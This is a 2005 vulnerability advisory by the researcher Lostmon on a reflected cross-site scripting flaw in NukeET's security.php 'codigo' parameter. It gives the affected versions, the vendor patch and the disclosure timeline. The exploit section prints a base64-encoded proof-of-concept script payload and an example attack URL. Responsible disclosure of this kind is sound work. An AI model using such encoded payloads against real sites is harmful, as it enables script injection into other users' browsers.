################################################
NukeET 'codigo' variable cross site scripting
vendor url:http://www.truzone.org
advisore:http://lostmon.blogspot.com/2005/05/
nukeet-codigo-variable-cross-site.html
Vendor confirmed : yes exploit available: yes
OSVDB ID:16214
Secunia:15332
BID:13570
Securitytracker:1013936
#################################################
NukeET Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'codigo' variable upon submission to the 'security.php'scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.
bug found by Suko , investigate and reporter by Lostmon.
##########
versions
##########
prior to 3.2 afected
##########
solution:
##########
vendor patch
http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77
###########
timeline
###########
discovered: 9 may 2005
vendor notify: 9 may 2005
vendor response : 10 may 2005
vendor fix: 10 may 2005
disclosure: 10 may 2005
##########
exploit:
##########
'codigo' variable acepts base64 url encode ,
if we encode for example:
<script>alert()</script><h1>XSS PoW@ !!!</h1>
in base64 this is:
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+
if we aded this base64 code the alert and de tag h1
is executed with any problem.
http://[victim]/security.php?codigo=
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+
################ End ##################
thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to Suko "la paciencia es una virtud pekeƱo Jedy"
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....